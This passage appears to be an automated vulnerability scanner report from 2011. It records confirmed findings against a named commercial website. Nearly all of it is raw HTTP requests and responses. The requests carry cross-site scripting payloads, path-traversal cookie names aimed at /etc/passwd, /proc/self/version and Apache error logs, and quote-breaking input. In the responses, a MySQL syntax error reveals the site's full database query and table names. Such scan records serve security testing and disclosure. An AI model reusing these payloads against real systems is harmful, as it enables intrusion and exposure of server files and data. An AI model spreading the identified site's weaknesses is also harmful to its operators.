Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=iig1fa2acsee32i6es3qld6p76; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005A5)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005A5)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/meac00/

/ppc/leadflow/meac00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/meac00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0005A9)</script>

Request

GET /ppc/leadflow/meac00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005A9)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/meac00/project.php?catId=30008&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mfaikltnl0op07gdb4fjgjlp95; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>' OR prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>' OR prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>' OR prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>' OR prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>' OR prj.project_page_url = 'leadflow/meac00/?nsextt='"--></style></script><script>netsparker(0x0005A9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005A9)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lgds00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005A7)%3C/script%3E

/ppc/leadflow/lgds00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005A7)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 80005
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0005A7)</script>

Request

GET /ppc/leadflow/lgds00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005A7)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=lslmvgsvm52p867vqa768nu416; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>' OR prj.project_page_url = 'leadflow/lgds00/project.php'"--></style></script><script>netsparker(0x0005A7)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 